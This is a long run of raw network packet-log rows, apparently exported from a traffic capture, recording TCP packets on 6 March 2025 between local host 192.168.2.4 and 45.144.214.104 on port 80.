                              Mar 6, 2025 07:06:15.070326090 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.070333958 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.070362091 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.070395947 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.070405006 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.070431948 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.070468903 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.070473909 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.070503950 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.070538998 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.070549011 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.070574045 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.070609093 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.070615053 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.070638895 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.070673943 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.070682049 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.070710897 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.070751905 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.070784092 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.070821047 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.070856094 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.070864916 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.070892096 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.070928097 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.070935011 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.074697971 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.074872971 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.074908972 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.074943066 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.074944973 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.074995041 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.075143099 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.075177908 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.075212955 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.075225115 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.075251102 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.075287104 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.075294018 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.075321913 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.075357914 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.075373888 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.075395107 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.075431108 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.075438976 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.075465918 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.075500965 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.075506926 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.081777096 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.081813097 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.081846952 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.081849098 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.081898928 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.081935883 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.081989050 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.082026005 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.082032919 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.082061052 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.082094908 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.082106113 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.131951094 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.154653072 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.154687881 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.154742002 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.154771090 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.154779911 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.154814959 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.154834032 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.154854059 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.154886961 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.154911041 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.154927015 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.154978991 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.157576084 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.157607079 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.157660961 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.157660961 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.157715082 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.157764912 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.157767057 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.157799959 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.157866001 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.157896996 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.157938004 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.157977104 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.157985926 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.158029079 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.158058882 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.158087015 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.158111095 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.158163071 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.158164024 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.158198118 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.158250093 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.158260107 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.158299923 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.158334970 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.158351898 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.158404112 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.158454895 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.158456087 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.158488989 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.158543110 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.158551931 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.158576012 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.158627033 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.158627033 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.158667088 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.158745050 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.158781052 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.158801079 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.158837080 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.158869028 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.158870935 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.158924103 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.158962965 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.159014940 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.159050941 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.159060001 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.159085035 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.159118891 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.159147024 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.159169912 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.159225941 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.159228086 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.159280062 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.159328938 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.159331083 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.159364939 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.159399986 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.159409046 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.159451008 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.159486055 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.159502983 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.159537077 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.159571886 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.159579992 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.159605026 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.159640074 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.159650087 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.159676075 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.159709930 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.159720898 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.159745932 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.159780025 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.159790039 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.159815073 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.159848928 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.159856081 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.159883022 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.159921885 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.159928083 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.159956932 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.160000086 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.160006046 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.160057068 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.160092115 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.160099983 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.160125971 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.160160065 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.160168886 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.160193920 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.160228014 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.160238028 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.160262108 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.160295963 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.160309076 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.160348892 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.160382986 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.160398960 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.160417080 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.160450935 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.160463095 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.160485029 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.160518885 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.160528898 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.160554886 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.160588980 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.160598040 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.160621881 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.160655975 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.160670042 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.160689116 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.160723925 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.160732985 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.160757065 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.160789967 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.160799026 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.160825014 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.160860062 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.160866976 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.160892963 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.160928011 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.160933971 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.160962105 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.160995007 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.161021948 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.161025047 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.161058903 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.161068916 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.161132097 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.161168098 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.161175966 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.161247015 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.161281109 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.161288977 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.164489985 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.164541006 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.164552927 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.164593935 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.164628029 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.164644003 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.164681911 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.164710999 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.164747953 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.164767027 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.164804935 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.164809942 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.164833069 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.164866924 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.164880037 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.164901018 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.164930105 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.164942026 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.164963007 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.164997101 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.165007114 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.165030956 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.165062904 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.165072918 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.165096998 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.165131092 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.165142059 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.171974897 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.172070980 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.172085047 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.172106028 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.172138929 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.172152996 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.172173977 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.172207117 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.172219992 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.172243118 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.172271967 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.172285080 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.225785017 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.266645908 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.266736984 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.266772985 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.266793013 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.266810894 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.266844988 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.266859055 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.266879082 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.266912937 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.266917944 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.267425060 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.267457962 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.267498016 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.267513037 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.267545938 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.267559052 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.267581940 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.267630100 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.267632008 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.267683983 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.267716885 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.267726898 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.267751932 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.267816067 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.267818928 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.267867088 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.267901897 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.267911911 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.267937899 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.267986059 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.267988920 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.268039942 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.268075943 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.268084049 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.268111944 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.268145084 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.268176079 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.268187046 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.268220901 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.268239021 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.268254995 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.268305063 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.268325090 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.268377066 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.268426895 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.268428087 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.268462896 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.268512011 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.268512011 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.268547058 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.268596888 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.268596888 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.268632889 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.268686056 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.268691063 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.268743038 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.268775940 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.268795013 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.268826962 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.268879890 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.268914938 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.268965960 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.268999100 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.269017935 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.269056082 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.269089937 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.269119978 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.269123077 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.269172907 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.269175053 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.269207954 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.269241095 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.269274950 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.269292116 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.269326925 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.269340992 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.269361019 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.269395113 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.269407034 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.269429922 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.269463062 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.269473076 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.269496918 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.269579887 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.269592047 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.269613981 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.269650936 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.269659996 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.269686937 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.269721031 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.269731045 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.269756079 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.269789934 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.269802094 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.269824028 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.269856930 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.269866943 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.269891024 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.269934893 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.269963026 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.269998074 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.270030975 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.270046949 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.270065069 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.270098925 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.270107985 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.270133018 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.270169020 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.270176888 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.270210028 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.270243883 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.270256042 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.270277977 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.270312071 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.270319939 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.270348072 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.270380020 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.270390034 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.270415068 CET804973345.144.214.104192.168.2.4
